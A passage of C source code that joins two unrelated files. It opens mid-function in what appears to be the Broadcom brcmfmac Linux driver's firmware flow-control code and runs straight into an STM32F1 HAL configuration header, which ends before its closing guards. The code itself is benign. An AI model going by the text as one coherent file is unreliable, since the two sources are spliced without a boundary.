len=%d (%d)\n", brcmf_fws_get_tlv_name(type), type, len, brcmf_fws_get_tlv_len(fws, type)); /* abort parsing when length invalid */ if (data_len < len + 2) break; if (len < brcmf_fws_get_tlv_len(fws, type)) break; err = BRCMF_FWS_RET_OK_NOSCHEDULE; switch (type) { case BRCMF_FWS_TYPE_COMP_TXSTATUS: break; case BRCMF_FWS_TYPE_HOST_REORDER_RXPKTS: rd = (struct brcmf_skb_reorder_data *)skb->cb; rd->reorder = data; break; case BRCMF_FWS_TYPE_MACDESC_ADD: case BRCMF_FWS_TYPE_MACDESC_DEL: brcmf_fws_macdesc_indicate(fws, type, data); break; case BRCMF_FWS_TYPE_MAC_OPEN: case BRCMF_FWS_TYPE_MAC_CLOSE: err = brcmf_fws_macdesc_state_indicate(fws, type, data); break; case BRCMF_FWS_TYPE_INTERFACE_OPEN: case BRCMF_FWS_TYPE_INTERFACE_CLOSE: err = brcmf_fws_interface_state_indicate(fws, type, data); break; case BRCMF_FWS_TYPE_MAC_REQUEST_CREDIT: case BRCMF_FWS_TYPE_MAC_REQUEST_PACKET: err = brcmf_fws_request_indicate(fws, type, data); break; case BRCMF_FWS_TYPE_TXSTATUS: brcmf_fws_txstatus_indicate(fws, data); break; case BRCMF_FWS_TYPE_FIFO_CREDITBACK: err = brcmf_fws_fifocreditback_indicate(fws, data); break; case BRCMF_FWS_TYPE_RSSI: brcmf_fws_rssi_indicate(fws, *data); break; case BRCMF_FWS_TYPE_TRANS_ID: brcmf_fws_dbg_seqnum_check(fws, data); break; case BRCMF_FWS_TYPE_PKTTAG: case BRCMF_FWS_TYPE_PENDING_TRAFFIC_BMP: default: fws->stats.tlv_invalid_type++; break; } if (err == BRCMF_FWS_RET_OK_SCHEDULE) status = BRCMF_FWS_RET_OK_SCHEDULE; signal_data += len + 2; data_len -= len + 2; } if (data_len != 0) fws->stats.tlv_parse_failed++; if (status == BRCMF_FWS_RET_OK_SCHEDULE) brcmf_fws_schedule_deq(fws); /* signalling processing result does * not affect the actual ethernet packet. */ skb_pull(skb, siglen); /* this may be a signal-only packet */ if (skb->len == 0) fws->stats.header_only_pkt++; } static u8 brcmf_fws_precommit_skb(struct brcmf_fws_info *fws, int fifo, struct sk_buff *p) { struct brcmf_skbuff_cb *skcb = brcmf_skbcb(p); struct brcmf_fws_mac_descriptor *entry = skcb->mac; u8 flags; if (skcb->state != BRCMF_FWS_SKBSTATE_SUPPRESSED) brcmf_skb_htod_tag_set_field(p, GENERATION, entry->generation); flags = BRCMF_FWS_HTOD_FLAG_PKTFROMHOST; if (brcmf_skb_if_flags_get_field(p, REQUESTED)) { /* * Indicate that this packet is being sent in response to an * explicit request from the firmware side. */ flags |= BRCMF_FWS_HTOD_FLAG_PKT_REQUESTED; } brcmf_skb_htod_tag_set_field(p, FLAGS, flags); return brcmf_fws_hdrpush(fws, p); } static void brcmf_fws_rollback_toq(struct brcmf_fws_info *fws, struct sk_buff *skb, int fifo) { struct brcmf_fws_mac_descriptor *entry; struct sk_buff *pktout; int qidx, hslot; int rc = 0; entry = brcmf_skbcb(skb)->mac; if (entry->occupied) { qidx = 2 * fifo; if (brcmf_skbcb(skb)->state == BRCMF_FWS_SKBSTATE_SUPPRESSED) qidx++; pktout = brcmu_pktq_penq_head(&entry->psq, qidx, skb); if (pktout == NULL) { brcmf_err("%s queue %d full\n", entry->name, qidx); rc = -ENOSPC; } } else { brcmf_err("%s entry removed\n", entry->name); rc = -ENOENT; } if (rc) { fws->stats.rollback_failed++; hslot = brcmf_skb_htod_tag_get_field(skb, HSLOT); brcmf_fws_txs_process(fws, BRCMF_FWS_TXSTATUS_HOST_TOSSED, hslot, 0, 0); } else { fws->stats.rollback_success++; brcmf_fws_return_credits(fws, fifo, 1); brcmf_fws_macdesc_return_req_credit(skb); } } static int brcmf_fws_borrow_credit(struct brcmf_fws_info *fws) { int lender_ac; if (time_after(fws->borrow_defer_timestamp, jiffies)) { fws->fifo_credit_map &= ~(1 << BRCMF_FWS_FIFO_AC_BE); return -ENAVAIL; } for (lender_ac = 0; lender_ac <= BRCMF_FWS_FIFO_AC_VO; lender_ac++) { if (fws->fifo_credit[lender_ac]) { fws->credits_borrowed[lender_ac]++; fws->fifo_credit[lender_ac]--; if (fws->fifo_credit[lender_ac] == 0) fws->fifo_credit_map &= ~(1 << lender_ac); fws->fifo_credit_map |= (1 << BRCMF_FWS_FIFO_AC_BE); brcmf_dbg(DATA, "borrow credit from: %d\n", lender_ac); return 0; } } fws->fifo_credit_map &= ~(1 << BRCMF_FWS_FIFO_AC_BE); return -ENAVAIL; } static int brcmf_fws_commit_skb(struct brcmf_fws_info *fws, int fifo, struct sk_buff *skb) { struct brcmf_skbuff_cb *skcb = brcmf_skbcb(skb); struct brcmf_fws_mac_descriptor *entry; int rc; u8 ifidx; u8 data_offset; entry = skcb->mac; if (IS_ERR(entry)) return PTR_ERR(entry); data_offset = brcmf_fws_precommit_skb(fws, fifo, skb); entry->transit_count++; if (entry->suppressed) entry->suppr_transit_count++; ifidx = brcmf_skb_if_flags_get_field(skb, INDEX); brcmf_fws_unlock(fws); rc = brcmf_proto_txdata(fws->drvr, ifidx, data_offset, skb); brcmf_fws_lock(fws); brcmf_dbg(DATA, "%s flags %X htod %X bus_tx %d\n", entry->name, skcb->if_flags, skcb->htod, rc); if (rc < 0) { entry->transit_count--; if (entry->suppressed) entry->suppr_transit_count--; (void)brcmf_proto_hdrpull(fws->drvr, false, skb, NULL); goto rollback; } fws->stats.pkt2bus++; fws->stats.send_pkts[fifo]++; if (brcmf_skb_if_flags_get_field(skb, REQUESTED)) fws->stats.requested_sent[fifo]++; return rc; rollback: brcmf_fws_rollback_toq(fws, skb, fifo); return rc; } static int brcmf_fws_assign_htod(struct brcmf_fws_info *fws, struct sk_buff *p, int fifo) { struct brcmf_skbuff_cb *skcb = brcmf_skbcb(p); int rc, hslot; skcb->htod = 0; skcb->htod_seq = 0; hslot = brcmf_fws_hanger_get_free_slot(&fws->hanger); brcmf_skb_htod_tag_set_field(p, HSLOT, hslot); brcmf_skb_htod_tag_set_field(p, FREERUN, skcb->mac->seq[fifo]); brcmf_skb_htod_tag_set_field(p, FIFO, fifo); rc = brcmf_fws_hanger_pushpkt(&fws->hanger, p, hslot); if (!rc) skcb->mac->seq[fifo]++; else fws->stats.generic_error++; return rc; } int brcmf_fws_process_skb(struct brcmf_if *ifp, struct sk_buff *skb) { struct brcmf_pub *drvr = ifp->drvr; struct brcmf_fws_info *fws = drvr->fws; struct brcmf_skbuff_cb *skcb = brcmf_skbcb(skb); struct ethhdr *eh = (struct ethhdr *)(skb->data); int fifo = BRCMF_FWS_FIFO_BCMC; bool multicast = is_multicast_ether_addr(eh->h_dest); int rc = 0; brcmf_dbg(DATA, "tx proto=0x%X\n", ntohs(eh->h_proto)); /* determine the priority */ if (!skb->priority) skb->priority = cfg80211_classify8021d(skb, NULL); drvr->tx_multicast += !!multicast; if (fws->avoid_queueing) { rc = brcmf_proto_txdata(drvr, ifp->ifidx, 0, skb); if (rc < 0) brcmf_txfinalize(ifp, skb, false); return rc; } /* set control buffer information */ skcb->if_flags = 0; skcb->state = BRCMF_FWS_SKBSTATE_NEW; brcmf_skb_if_flags_set_field(skb, INDEX, ifp->ifidx); if (!multicast) fifo = brcmf_fws_prio2fifo[skb->priority]; brcmf_fws_lock(fws); if (fifo != BRCMF_FWS_FIFO_AC_BE && fifo < BRCMF_FWS_FIFO_BCMC) fws->borrow_defer_timestamp = jiffies + BRCMF_FWS_BORROW_DEFER_PERIOD; skcb->mac = brcmf_fws_macdesc_find(fws, ifp, eh->h_dest); brcmf_dbg(DATA, "%s mac %pM multi %d fifo %d\n", skcb->mac->name, eh->h_dest, multicast, fifo); if (!brcmf_fws_assign_htod(fws, skb, fifo)) { brcmf_fws_enq(fws, BRCMF_FWS_SKBSTATE_DELAYED, fifo, skb); brcmf_fws_schedule_deq(fws); } else { brcmf_err("drop skb: no hanger slot\n"); brcmf_txfinalize(ifp, skb, false); rc = -ENOMEM; } brcmf_fws_unlock(fws); return rc; } void brcmf_fws_reset_interface(struct brcmf_if *ifp) { struct brcmf_fws_mac_descriptor *entry = ifp->fws_desc; brcmf_dbg(TRACE, "enter: idx=%d\n", ifp->bssidx); if (!entry) return; brcmf_fws_macdesc_init(entry, ifp->mac_addr, ifp->ifidx); } void brcmf_fws_add_interface(struct brcmf_if *ifp) { struct brcmf_fws_info *fws = ifp->drvr->fws; struct brcmf_fws_mac_descriptor *entry; if (!ifp->ndev) return; entry = &fws->desc.iface[ifp->ifidx]; ifp->fws_desc = entry; brcmf_fws_macdesc_init(entry, ifp->mac_addr, ifp->ifidx); brcmf_fws_macdesc_set_name(fws, entry); brcmu_pktq_init(&entry->psq, BRCMF_FWS_PSQ_PREC_COUNT, BRCMF_FWS_PSQ_LEN); brcmf_dbg(TRACE, "added %s\n", entry->name); } void brcmf_fws_del_interface(struct brcmf_if *ifp) { struct brcmf_fws_mac_descriptor *entry = ifp->fws_desc; if (!entry) return; brcmf_fws_lock(ifp->drvr->fws); ifp->fws_desc = NULL; brcmf_dbg(TRACE, "deleting %s\n", entry->name); brcmf_fws_macdesc_deinit(entry); brcmf_fws_cleanup(ifp->drvr->fws, ifp->ifidx); brcmf_fws_unlock(ifp->drvr->fws); } static void brcmf_fws_dequeue_worker(struct work_struct *worker) { struct brcmf_fws_info *fws; struct brcmf_pub *drvr; struct sk_buff *skb; int fifo; u32 hslot; u32 ifidx; int ret; fws = container_of(worker, struct brcmf_fws_info, fws_dequeue_work); drvr = fws->drvr; brcmf_fws_lock(fws); for (fifo = BRCMF_FWS_FIFO_BCMC; fifo >= 0 && !fws->bus_flow_blocked; fifo--) { if (!brcmf_fws_fc_active(fws)) { while ((skb = brcmf_fws_deq(fws, fifo)) != NULL) { hslot = brcmf_skb_htod_tag_get_field(skb, HSLOT); brcmf_fws_hanger_poppkt(&fws->hanger, hslot, &skb, true); ifidx = brcmf_skb_if_flags_get_field(skb, INDEX); /* Use proto layer to send data frame */ brcmf_fws_unlock(fws); ret = brcmf_proto_txdata(drvr, ifidx, 0, skb); brcmf_fws_lock(fws); if (ret < 0) brcmf_txfinalize(brcmf_get_ifp(drvr, ifidx), skb, false); if (fws->bus_flow_blocked) break; } continue; } while ((fws->fifo_credit[fifo]) || ((!fws->bcmc_credit_check) && (fifo == BRCMF_FWS_FIFO_BCMC))) { skb = brcmf_fws_deq(fws, fifo); if (!skb) break; fws->fifo_credit[fifo]--; if (brcmf_fws_commit_skb(fws, fifo, skb)) break; if (fws->bus_flow_blocked) break; } if ((fifo == BRCMF_FWS_FIFO_AC_BE) && (fws->fifo_credit[fifo] == 0) && (!fws->bus_flow_blocked)) { while (brcmf_fws_borrow_credit(fws) == 0) { skb = brcmf_fws_deq(fws, fifo); if (!skb) { brcmf_fws_return_credits(fws, fifo, 1); break; } if (brcmf_fws_commit_skb(fws, fifo, skb)) break; if (fws->bus_flow_blocked) break; } } } brcmf_fws_unlock(fws); } #ifdef DEBUG static int brcmf_debugfs_fws_stats_read(struct seq_file *seq, void *data) { struct brcmf_bus *bus_if = dev_get_drvdata(seq->private); struct brcmf_fws_stats *fwstats = &bus_if->drvr->fws->stats; seq_printf(seq, "header_pulls: %u\n" "header_only_pkt: %u\n" "tlv_parse_failed: %u\n" "tlv_invalid_type: %u\n" "mac_update_fails: %u\n" "ps_update_fails: %u\n" "if_update_fails: %u\n" "pkt2bus: %u\n" "generic_error: %u\n" "rollback_success: %u\n" "rollback_failed: %u\n" "delayq_full: %u\n" "supprq_full: %u\n" "txs_indicate: %u\n" "txs_discard: %u\n" "txs_suppr_core: %u\n" "txs_suppr_ps: %u\n" "txs_tossed: %u\n" "txs_host_tossed: %u\n" "bus_flow_block: %u\n" "fws_flow_block: %u\n" "send_pkts: BK:%u BE:%u VO:%u VI:%u BCMC:%u\n" "requested_sent: BK:%u BE:%u VO:%u VI:%u BCMC:%u\n", fwstats->header_pulls, fwstats->header_only_pkt, fwstats->tlv_parse_failed, fwstats->tlv_invalid_type, fwstats->mac_update_failed, fwstats->mac_ps_update_failed, fwstats->if_update_failed, fwstats->pkt2bus, fwstats->generic_error, fwstats->rollback_success, fwstats->rollback_failed, fwstats->delayq_full_error, fwstats->supprq_full_error, fwstats->txs_indicate, fwstats->txs_discard, fwstats->txs_supp_core, fwstats->txs_supp_ps, fwstats->txs_tossed, fwstats->txs_host_tossed, fwstats->bus_flow_block, fwstats->fws_flow_block, fwstats->send_pkts[0], fwstats->send_pkts[1], fwstats->send_pkts[2], fwstats->send_pkts[3], fwstats->send_pkts[4], fwstats->requested_sent[0], fwstats->requested_sent[1], fwstats->requested_sent[2], fwstats->requested_sent[3], fwstats->requested_sent[4]); return 0; } #else static int brcmf_debugfs_fws_stats_read(struct seq_file *seq, void *data) { return 0; } #endif int brcmf_fws_init(struct brcmf_pub *drvr) { struct brcmf_fws_info *fws; struct brcmf_if *ifp; u32 tlv = BRCMF_FWS_FLAGS_RSSI_SIGNALS; int rc; u32 mode; drvr->fws = kzalloc(sizeof(*(drvr->fws)), GFP_KERNEL); if (!drvr->fws) { rc = -ENOMEM; goto fail; } fws = drvr->fws; spin_lock_init(&fws->spinlock); /* set linkage back */ fws->drvr = drvr; fws->fcmode = fcmode; if ((drvr->bus_if->always_use_fws_queue == false) && (fcmode == BRCMF_FWS_FCMODE_NONE)) { fws->avoid_queueing = true; brcmf_dbg(INFO, "FWS queueing will be avoided\n"); return 0; } fws->fws_wq = create_singlethread_workqueue("brcmf_fws_wq"); if (fws->fws_wq == NULL) { brcmf_err("workqueue creation failed\n"); rc = -EBADF; goto fail; } INIT_WORK(&fws->fws_dequeue_work, brcmf_fws_dequeue_worker); /* enable firmware signalling if fcmode active */ if (fws->fcmode != BRCMF_FWS_FCMODE_NONE) tlv |= BRCMF_FWS_FLAGS_XONXOFF_SIGNALS | BRCMF_FWS_FLAGS_CREDIT_STATUS_SIGNALS | BRCMF_FWS_FLAGS_HOST_PROPTXSTATUS_ACTIVE | BRCMF_FWS_FLAGS_HOST_RXREORDER_ACTIVE; rc = brcmf_fweh_register(drvr, BRCMF_E_FIFO_CREDIT_MAP, brcmf_fws_notify_credit_map); if (rc < 0) { brcmf_err("register credit map handler failed\n"); goto fail; } rc = brcmf_fweh_register(drvr, BRCMF_E_BCMC_CREDIT_SUPPORT, brcmf_fws_notify_bcmc_credit_support); if (rc < 0) { brcmf_err("register bcmc credit handler failed\n"); brcmf_fweh_unregister(drvr, BRCMF_E_FIFO_CREDIT_MAP); goto fail; } /* Setting the iovar may fail if feature is unsupported * so leave the rc as is so driver initialization can * continue. Set mode back to none indicating not enabled. */ fws->fw_signals = true; ifp = brcmf_get_ifp(drvr, 0); if (brcmf_fil_iovar_int_set(ifp, "tlv", tlv)) { brcmf_err("failed to set bdcv2 tlv signaling\n"); fws->fcmode = BRCMF_FWS_FCMODE_NONE; fws->fw_signals = false; } if (brcmf_fil_iovar_int_set(ifp, "ampdu_hostreorder", 1)) brcmf_dbg(INFO, "enabling AMPDU host-reorder failed\n"); /* Enable seq number reuse, if supported */ if (brcmf_fil_iovar_int_get(ifp, "wlfc_mode", &mode) == 0) { if (BRCMF_FWS_MODE_GET_REUSESEQ(mode)) { mode = 0; BRCMF_FWS_MODE_SET_REUSESEQ(mode, 1); if (brcmf_fil_iovar_int_set(ifp, "wlfc_mode", mode) == 0) { BRCMF_FWS_MODE_SET_REUSESEQ(fws->mode, 1); } } } brcmf_fws_hanger_init(&fws->hanger); brcmf_fws_macdesc_init(&fws->desc.other, NULL, 0); brcmf_fws_macdesc_set_name(fws, &fws->desc.other); brcmu_pktq_init(&fws->desc.other.psq, BRCMF_FWS_PSQ_PREC_COUNT, BRCMF_FWS_PSQ_LEN); /* create debugfs file for statistics */ brcmf_debugfs_add_entry(drvr, "fws_stats", brcmf_debugfs_fws_stats_read); brcmf_dbg(INFO, "%s bdcv2 tlv signaling [%x]\n", fws->fw_signals ? "enabled" : "disabled", tlv); return 0; fail: brcmf_fws_deinit(drvr); return rc; } void brcmf_fws_deinit(struct brcmf_pub *drvr) { struct brcmf_fws_info *fws = drvr->fws; if (!fws) return; if (drvr->fws->fws_wq) destroy_workqueue(drvr->fws->fws_wq); /* cleanup */ brcmf_fws_lock(fws); brcmf_fws_cleanup(fws, -1); drvr->fws = NULL; brcmf_fws_unlock(fws); /* free top structure */ kfree(fws); } bool brcmf_fws_fc_active(struct brcmf_fws_info *fws) { if (!fws->creditmap_received) return false; return fws->fcmode != BRCMF_FWS_FCMODE_NONE; } void brcmf_fws_bustxfail(struct brcmf_fws_info *fws, struct sk_buff *skb) { u32 hslot; if (brcmf_skbcb(skb)->state == BRCMF_FWS_SKBSTATE_TIM) { brcmu_pkt_buf_free_skb(skb); return; } brcmf_fws_lock(fws); hslot = brcmf_skb_htod_tag_get_field(skb, HSLOT); brcmf_fws_txs_process(fws, BRCMF_FWS_TXSTATUS_HOST_TOSSED, hslot, 0, 0); brcmf_fws_unlock(fws); } void brcmf_fws_bus_blocked(struct brcmf_pub *drvr, bool flow_blocked) { struct brcmf_fws_info *fws = drvr->fws; fws->bus_flow_blocked = flow_blocked; if (!flow_blocked) brcmf_fws_schedule_deq(fws); else fws->stats.bus_flow_block++; }
/** ****************************************************************************** * @file stm32f1xx_hal_conf.h * @brief HAL configuration file. ****************************************************************************** * @attention * * <h2><center>&copy; COPYRIGHT(c) 2019 STMicroelectronics</center></h2> * * Redistribution and use in source and binary forms, with or without modification, * are permitted provided that the following conditions are met: * 1. Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * 3. Neither the name of STMicroelectronics nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * ****************************************************************************** */ /* Define to prevent recursive inclusion -------------------------------------*/ #ifndef __STM32F1xx_HAL_CONF_H #define __STM32F1xx_HAL_CONF_H #ifdef __cplusplus extern "C" { #endif /* Exported types ------------------------------------------------------------*/ /* Exported constants --------------------------------------------------------*/ /* ########################## Module Selection ############################## */ /** * @brief This is the list of modules to be used in the HAL driver */ #define HAL_MODULE_ENABLED /*#define HAL_ADC_MODULE_ENABLED */ /*#define HAL_CRYP_MODULE_ENABLED */ /*#define HAL_CAN_MODULE_ENABLED */ /*#define HAL_CEC_MODULE_ENABLED */ /*#define HAL_CORTEX_MODULE_ENABLED */ #define HAL_CRC_MODULE_ENABLED /*#define HAL_DAC_MODULE_ENABLED */ /*#define HAL_DMA_MODULE_ENABLED */ /*#define HAL_ETH_MODULE_ENABLED */ /*#define HAL_FLASH_MODULE_ENABLED */ #define HAL_GPIO_MODULE_ENABLED /*#define HAL_I2C_MODULE_ENABLED */ /*#define HAL_I2S_MODULE_ENABLED */ /*#define HAL_IRDA_MODULE_ENABLED */ #define HAL_IWDG_MODULE_ENABLED /*#define HAL_NOR_MODULE_ENABLED */ /*#define HAL_NAND_MODULE_ENABLED */ /*#define HAL_PCCARD_MODULE_ENABLED */ /*#define HAL_PCD_MODULE_ENABLED */ /*#define HAL_HCD_MODULE_ENABLED */ /*#define HAL_PWR_MODULE_ENABLED */ /*#define HAL_RCC_MODULE_ENABLED */ #define HAL_RTC_MODULE_ENABLED /*#define HAL_SD_MODULE_ENABLED */ /*#define HAL_MMC_MODULE_ENABLED */ /*#define HAL_SDRAM_MODULE_ENABLED */ /*#define HAL_SMARTCARD_MODULE_ENABLED */ #define HAL_SPI_MODULE_ENABLED /*#define HAL_SRAM_MODULE_ENABLED */ #define HAL_TIM_MODULE_ENABLED #define HAL_UART_MODULE_ENABLED /*#define HAL_USART_MODULE_ENABLED */ /*#define HAL_WWDG_MODULE_ENABLED */ /*#define HAL_EXTI_MODULE_ENABLED */ #define HAL_CORTEX_MODULE_ENABLED #define HAL_DMA_MODULE_ENABLED #define HAL_FLASH_MODULE_ENABLED #define HAL_GPIO_MODULE_ENABLED #define HAL_PWR_MODULE_ENABLED #define HAL_RCC_MODULE_ENABLED /* ########################## Oscillator Values adaptation ####################*/ /** * @brief Adjust the value of External High Speed oscillator (HSE) used in your application. * This value is used by the RCC HAL module to compute the system frequency * (when HSE is used as system clock source, directly or through the PLL). */ #if !defined (HSE_VALUE) #define HSE_VALUE ((uint32_t)8000000) /*!< Value of the External oscillator in Hz */ #endif /* HSE_VALUE */ #if !defined (HSE_STARTUP_TIMEOUT) #define HSE_STARTUP_TIMEOUT ((uint32_t)100) /*!< Time out for HSE start up, in ms */ #endif /* HSE_STARTUP_TIMEOUT */ /** * @brief Internal High Speed oscillator (HSI) value. * This value is used by the RCC HAL module to compute the system frequency * (when HSI is used as system clock source, directly or through the PLL). */ #if !defined (HSI_VALUE) #define HSI_VALUE ((uint32_t)8000000) /*!< Value of the Internal oscillator in Hz*/ #endif /* HSI_VALUE */ /** * @brief Internal Low Speed oscillator (LSI) value. */ #if !defined (LSI_VALUE) #define LSI_VALUE 40000U /*!< LSI Typical Value in Hz */ #endif /* LSI_VALUE */ /*!< Value of the Internal Low Speed oscillator in Hz The real value may vary depending on the variations in voltage and temperature. */ /** * @brief External Low Speed oscillator (LSE) value. * This value is used by the UART, RTC HAL module to compute the system frequency */ #if !defined (LSE_VALUE) #define LSE_VALUE ((uint32_t)32768) /*!< Value of the External oscillator in Hz*/ #endif /* LSE_VALUE */ #if !defined (LSE_STARTUP_TIMEOUT) #define LSE_STARTUP_TIMEOUT ((uint32_t)5000) /*!< Time out for LSE start up, in ms */ #endif /* LSE_STARTUP_TIMEOUT */ /* Tip: To avoid modifying this file each time you need to use different HSE, === you can define the HSE value in your toolchain compiler preprocessor. */ /* ########################### System Configuration ######################### */ /** * @brief This is the HAL system configuration section */ #define VDD_VALUE ((uint32_t)3300) /*!< Value of VDD in mv */ #define TICK_INT_PRIORITY ((uint32_t)0) /*!< tick interrupt priority (lowest by default) */ #define USE_RTOS 0 #define PREFETCH_ENABLE 1 /* ########################## Assert Selection ############################## */ /** * @brief Uncomment the line below to expanse the "assert_param" macro in the * HAL drivers code */ /* #define USE_FULL_ASSERT 1U */ /* ################## Ethernet peripheral configuration ##################### */ /* Section 1 : Ethernet peripheral configuration */ /* MAC ADDRESS: MAC_ADDR0:MAC_ADDR1:MAC_ADDR2:MAC_ADDR3:MAC_ADDR4:MAC_ADDR5 */ #define MAC_ADDR0 2 #define MAC_ADDR1 0 #define MAC_ADDR2 0 #define MAC_ADDR3 0 #define MAC_ADDR4 0 #define MAC_ADDR5 0 /* Definition of the Ethernet driver buffers size and count */ #define ETH_RX_BUF_SIZE ETH_MAX_PACKET_SIZE /* buffer size for receive */ #define ETH_TX_BUF_SIZE ETH_MAX_PACKET_SIZE /* buffer size for transmit */ #define ETH_RXBUFNB ((uint32_t)8) /* 4 Rx buffers of size ETH_RX_BUF_SIZE */ #define ETH_TXBUFNB ((uint32_t)4) /* 4 Tx buffers of size ETH_TX_BUF_SIZE */ /* Section 2: PHY configuration section */ /* DP83848_PHY_ADDRESS Address*/ #define DP83848_PHY_ADDRESS 0x01U /* PHY Reset delay these values are based on a 1 ms Systick interrupt*/ #define PHY_RESET_DELAY ((uint32_t)0x000000FF) /* PHY Configuration delay */ #define PHY_CONFIG_DELAY ((uint32_t)0x00000FFF) #define PHY_READ_TO ((uint32_t)0x0000FFFF) #define PHY_WRITE_TO ((uint32_t)0x0000FFFF) /* Section 3: Common PHY Registers */ #define PHY_BCR ((uint16_t)0x00) /*!< Transceiver Basic Control Register */ #define PHY_BSR ((uint16_t)0x01) /*!< Transceiver Basic Status Register */ #define PHY_RESET ((uint16_t)0x8000) /*!< PHY Reset */ #define PHY_LOOPBACK ((uint16_t)0x4000) /*!< Select loop-back mode */ #define PHY_FULLDUPLEX_100M ((uint16_t)0x2100) /*!< Set the full-duplex mode at 100 Mb/s */ #define PHY_HALFDUPLEX_100M ((uint16_t)0x2000) /*!< Set the half-duplex mode at 100 Mb/s */ #define PHY_FULLDUPLEX_10M ((uint16_t)0x0100) /*!< Set the full-duplex mode at 10 Mb/s */ #define PHY_HALFDUPLEX_10M ((uint16_t)0x0000) /*!< Set the half-duplex mode at 10 Mb/s */ #define PHY_AUTONEGOTIATION ((uint16_t)0x1000) /*!< Enable auto-negotiation function */ #define PHY_RESTART_AUTONEGOTIATION ((uint16_t)0x0200) /*!< Restart auto-negotiation function */ #define PHY_POWERDOWN ((uint16_t)0x0800) /*!< Select the power down mode */ #define PHY_ISOLATE ((uint16_t)0x0400) /*!< Isolate PHY from MII */ #define PHY_AUTONEGO_COMPLETE ((uint16_t)0x0020) /*!< Auto-Negotiation process completed */ #define PHY_LINKED_STATUS ((uint16_t)0x0004) /*!< Valid link established */ #define PHY_JABBER_DETECTION ((uint16_t)0x0002) /*!< Jabber condition detected */ /* Section 4: Extended PHY Registers */ #define PHY_SR ((uint16_t)0x10U) /*!< PHY status register Offset */ #define PHY_SPEED_STATUS ((uint16_t)0x0002U) /*!< PHY Speed mask */ #define PHY_DUPLEX_STATUS ((uint16_t)0x0004U) /*!< PHY Duplex mask */ /* Includes ------------------------------------------------------------------*/ /** * @brief Include module's header file */ #ifdef HAL_RCC_MODULE_ENABLED #include "stm32f1xx_hal_rcc.h" #endif /* HAL_RCC_MODULE_ENABLED */ #ifdef HAL_EXTI_MODULE_ENABLED #include "stm32f1xx_hal_exti.h" #endif /* HAL_EXTI_MODULE_ENABLED */ #ifdef HAL_GPIO_MODULE_ENABLED #include "stm32f1xx_hal_gpio.h" #endif /* HAL_GPIO_MODULE_ENABLED */ #ifdef HAL_DMA_MODULE_ENABLED #include "stm32f1xx_hal_dma.h" #endif /* HAL_DMA_MODULE_ENABLED */ #ifdef HAL_ETH_MODULE_ENABLED #include "stm32f1xx_hal_eth.h" #endif /* HAL_ETH_MODULE_ENABLED */ #ifdef HAL_CAN_MODULE_ENABLED #include "stm32f1xx_hal_can.h" #endif /* HAL_CAN_MODULE_ENABLED */ #ifdef HAL_CEC_MODULE_ENABLED #include "stm32f1xx_hal_cec.h" #endif /* HAL_CEC_MODULE_ENABLED */ #ifdef HAL_CORTEX_MODULE_ENABLED #include "stm32f1xx_hal_cortex.h" #endif /* HAL_CORTEX_MODULE_ENABLED */ #ifdef HAL_ADC_MODULE_ENABLED #include "stm32f1xx_hal_adc.h" #endif /* HAL_ADC_MODULE_ENABLED */ #ifdef HAL_CRC_MODULE_ENABLED #include "stm32f1xx_hal_crc.h" #endif /* HAL_CRC_MODULE_ENABLED */ #ifdef HAL_DAC_MODULE_ENABLED #include "stm32f1xx_hal_dac.h" #endif /* HAL_DAC_MODULE_ENABLED */ #ifdef HAL_FLASH_MODULE_ENABLED #include "stm32f1xx_hal_flash.h" #endif /* HAL_FLASH_MODULE_ENABLED */ #ifdef HAL_SRAM_MODULE_ENABLED #include "stm32f1xx_hal_sram.h" #endif /* HAL_SRAM_MODULE_ENABLED */ #ifdef HAL_NOR_MODULE_ENABLED #include "stm32f1xx_hal_nor.h" #endif /* HAL_NOR_MODULE_ENABLED */ #ifdef HAL_I2C_MODULE_ENABLED #include "stm32f1xx_hal_i2c.h" #endif /* HAL_I2C_MODULE_ENABLED */ #ifdef HAL_I2S_MODULE_ENABLED #include "stm32f1xx_hal_i2s.h" #endif /* HAL_I2S_MODULE_ENABLED */ #ifdef HAL_IWDG_MODULE_ENABLED #include "stm32f1xx_hal_iwdg.h" #endif /* HAL_IWDG_MODULE_ENABLED */ #ifdef HAL_PWR_MODULE_ENABLED #include "stm32f1xx_hal_pwr.h" #endif /* HAL_PWR_MODULE_ENABLED */ #ifdef HAL_RTC_MODULE_ENABLED #include "stm32f1xx_hal_rtc.h" #endif /* HAL_RTC_MODULE_ENABLED */ #ifdef HAL_PCCARD_MODULE_ENABLED #include "stm32f1xx_hal_pccard.h" #endif /* HAL_PCCARD_MODULE_ENABLED */ #ifdef HAL_SD_MODULE_ENABLED #include "stm32f1xx_hal_sd.h" #endif /* HAL_SD_MODULE_ENABLED */ #ifdef HAL_MMC_MODULE_ENABLED #include "stm32f1xx_hal_mmc.h" #endif /* HAL_MMC_MODULE_ENABLED */ #ifdef HAL_NAND_MODULE_ENABLED #include "stm32f1xx_hal_nand.h" #endif /* HAL_NAND_MODULE_ENABLED */ #ifdef HAL_SPI_MODULE_ENABLED #include "stm32f1xx_hal_spi.h" #endif /* HAL_SPI_MODULE_ENABLED */ #ifdef HAL_TIM_MODULE_ENABLED #include "stm32f1xx_hal_tim.h" #endif /* HAL_TIM_MODULE_ENABLED */ #ifdef HAL_UART_MODULE_ENABLED #include "stm32f1xx_hal_uart.h" #endif /* HAL_UART_MODULE_ENABLED */ 